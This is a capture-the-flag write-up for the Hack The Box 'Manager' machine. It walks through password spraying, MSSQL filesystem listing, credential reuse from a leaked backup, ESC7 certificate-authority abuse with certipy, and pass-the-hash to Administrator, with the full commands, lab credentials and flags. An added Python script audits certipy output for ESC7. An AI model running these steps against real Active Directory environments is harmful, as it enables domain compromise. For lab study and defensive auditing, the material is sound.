HTB - Manager

Description
Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The xp_dirtree procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports-scan
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
49693/tcp open unknown
49782/tcp open unknown
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p53,80,88,135,139,389,445,1433,5985 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-03 01:37:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-01T19:35:12
|_Not valid after: 2054-11-01T19:35:12
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m01s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
Summary
* Open ports: 53,80,88,135,139,389,445,1433,5985
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - KERBEROS - RPC - SMB - MSSQL - WinRM
* Important notes: Domain: manager.htb - DNS:dc01.manager.htb
hosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $sudo sh -c "echo '$ip dc01 dc01.manager.htb manager.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $tail -n1 /etc/hosts
10.10.11.236 dc01 dc01.manager.htb manager.htb
Service Enumeration
HTTP Enumeration
I don't get anything new from fuzzing files and directories beyond those I find on the website.

Not many things are in this web app as it seems to be a static website, so I will switch to other services running on this box.
SMB & RPC Enumeration
I don't get any useful permissions on the shares, but I get the users on the domain using RID brute-forcing.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $nxc smb dc01 -u 'guest' -p '' --shares
SMB 10.10.11.236 445 DC01 [+] manager.htb\guest:
SMB 10.10.11.236 445 DC01 [*] Enumerated shares
SMB 10.10.11.236 445 DC01 Share Permissions Remark
SMB 10.10.11.236 445 DC01 ----- ----------- ------
SMB 10.10.11.236 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.236 445 DC01 C$ Default share
SMB 10.10.11.236 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.236 445 DC01 NETLOGON Logon server share
SMB 10.10.11.236 445 DC01 SYSVOL Logon server share

Foothold
Since I don't have any password yet, I will try each username as its own password and I get a hit.

I can brute-force the MSSQL login, too.

With valid credentials, I will look at the share access and the MSSQL database. When I looked at the shares, I didn't get anything interesting, so I will move to MSSQL.

And I'm in the database :))

When I deal with MSSQL, I perform a checklist of possible attack paths, so I will create one:
* Check for admin access
* Check the databases for juicy info and secrets
* Check the possibility of capturing the MSSQL service account hash
* Check for impersonating other users
* Check for trustworthy databases
* Check for linked servers
* Check for read or write access to the file system
* Check for executing commands with xp_cmdshell
With this list, I can move forward and I will use mssqlclient.py built-in commands.
SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
-----------
0
SQL (MANAGER\Operator guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
SQL (MANAGER\Operator guest@master)> enum_owner
Database Owner
-------- -----
master sa
tempdb sa
model sa
msdb sa
SQL (MANAGER\Operator guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
--------------- ---------------- ----------- --------------- ------------------ ------------ -------
DC01\SQLEXPRESS SQLNCLI SQL Server DC01\SQLEXPRESS NULL NULL NULL
SQL (MANAGER\Operator guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
So far I don't get any possible path, and even when I tried to get the hash of the service account, I got the hash of the machine account, which is uncrackable.

The last thing I can try is to check read or write access to the file system. I will use xp_dirtree to list the directories in a path.

Lateral Movement
With the IIS web server running on the box, I can try to read web.config or another important file in its directory, inetpub. There are several interesting files here: web.config & website-backup-27-07-23-old.zip

When I tried to access web.config through the web server, it gave me file not found.

but when I tried to access the .zip file, it was downloaded

I created a new directory, moved the zip file into it, unzipped it and listed the content. There is an odd .xml file

It contains credentials for the raven user.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $cat .old-conf.xml
..snip..
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
..snip..
These credentials are valid and I have access to Winrm, too :))

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $evil-winrm -i dc01 -u raven -p 'R4v3nBe5tD3veloP3r!123'
*Evil-WinRM* PS C:\Users\Raven\Documents> type ..\Desktop\user.txt
518fbc8e81299098bac6e8654ae731a1
User Flag: 518fbc8e81299098bac6xxxxxxxxxxxxx
Privilege Escalation
Looking at the account privs and groups, I noticed that he is a member of Certificate Service DCOM Access, which indicates that a PKI exists.

I can confirm with NetExec using the ADCS module
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $nxc ldap dc01 -u raven -p 'R4v3nBe5tD3veloP3r!123' -M adcs
LDAP 10.10.11.236 389 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123
ADCS 10.10.11.236 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.236 389 DC01 Found PKI Enrollment Server: dc01.manager.htb
ADCS 10.10.11.236 389 DC01 Found CN: manager-DC01-CA
When dealing with ADCS, I hurry to enumerate possible escalation (ESC) paths using certipy. Then I will also use certipy to find vulnerable templates or permissions.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
The user raven has Enroll and ManageCA rights, which means he can enroll a new certificate and edit permissions on any template, so I can make it vulnerable to ESC4.

The built-in SubCA template is also enabled (as it is by default). This template is vulnerable to ESC1 but only permits Domain Admins and Enterprise Admins to enroll. The certificate is present and enabled (Enabled: True). If the SubCA certificate is disabled we should enable it. Since we have ManageCA rights, we can assign ManageCertificate rights to any account.
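As an added example, not taken from the original writeup or from Certipy itself, the following Python audits the Access Rights block that certipy find prints and flags the ESC7 condition described above: any principal outside the expected CA admin groups holding ManageCa or ManageCertificates. The sample input is transcribed from the certipy output earlier on this page; the parsing regexes and the allowlist of admin groups are my assumptions.

```python
"""Audit the Access Rights block of a certipy 'find' CA listing for ESC7:
a principal outside the CA admin groups holding ManageCa or ManageCertificates."""
import re
# Assumed allowlist: groups expected to manage the CA. Anything else is flagged.
EXPECTED_CA_ADMINS = {"Administrators", "Domain Admins", "Enterprise Admins"}
DANGEROUS_RIGHTS = ("ManageCa", "ManageCertificates")
# Constructed sample, transcribed from the certipy output earlier on this page.
SAMPLE = r"""
      Owner                           : MANAGER.HTB\Administrators
      Access Rights
        Enroll                        : MANAGER.HTB\Operator
                                        MANAGER.HTB\Authenticated Users
                                        MANAGER.HTB\Raven
        ManageCertificates            : MANAGER.HTB\Administrators
                                        MANAGER.HTB\Domain Admins
                                        MANAGER.HTB\Enterprise Admins
        ManageCa                      : MANAGER.HTB\Administrators
                                        MANAGER.HTB\Domain Admins
                                        MANAGER.HTB\Enterprise Admins
                                        MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                            : 'MANAGER.HTB\\Raven' has dangerous permissions
"""

def parse_access_rights(text):
    """Map each right to its principals. certipy prints one principal per line;
    lines without a 'Right :' prefix continue the most recent right."""
    rights, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"^(Enroll|ManageCertificates|ManageCa)\s*:\s*(\S.*)$", line)
        if m:
            current = m.group(1)
            rights.setdefault(current, []).append(m.group(2).strip())
        elif current and re.match(r"^[A-Za-z0-9.-]+\\", line):
            rights[current].append(line)  # continuation line: a bare principal
        elif line.startswith("["):  # next certipy section, e.g. '[!] Vulnerabilities'
            current = None
    return rights

def esc7_findings(rights):
    """Return (right, principal) for every non-admin holder of a dangerous right."""
    return [(right, p) for right in DANGEROUS_RIGHTS for p in rights.get(right, [])
            if p.split("\\", 1)[-1] not in EXPECTED_CA_ADMINS]

if __name__ == "__main__":
    for right, who in esc7_findings(parse_access_rights(SAMPLE)):
        print(f"ESC7 candidate: {who} holds {right} but is not a CA admin group")
```

Run over the later certipy find output on this page (after the -add-officer step), the same check also flags Raven under ManageCertificates.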
Exploitation Path
* Enable SubCA template
* Grant ManageCertificate rights
* Request certificate for SubCA template impersonating administrator
* Approve the enrollment request as raven
* Access the machine as an administrator
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -enable-template 'SubCA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Grant ManageCertificate rights
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -add-officer raven
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Confirm the new permission
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $ certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -stdout -dc-ip 10.10.11.236
..snip..
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
With the SubCA template enabled and with ManageCertificates rights, we can request a certificate by adding an alternative SAN and selecting the SubCA template.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 20
Would you like to save the private key? (y/N) y
[*] Saved private key to 20.key
[-] Failed to request certificate
We need to note the request ID 20 and answer yes to the question: Would you like to save the private key? (y/N). We will need this private key to retrieve the certificate later.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -issue-request 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -retrieve 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 20
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '20.key'
[*] Saved certificate and private key to 'administrator.pfx'
Now I can authenticate as an administrator with the .pfx file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy auth -pfx administrator.pfx -domain manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
Access the machine
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $evil-winrm -i dc01 -u administrator -H ae5064c2f62317332c88629e025924ef
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
5fa4f9480b1bba44627e3fcfaf5a08a5
Root Flag: 5fa4f9480b1bba44627exxxxxxxxxxxxxxxx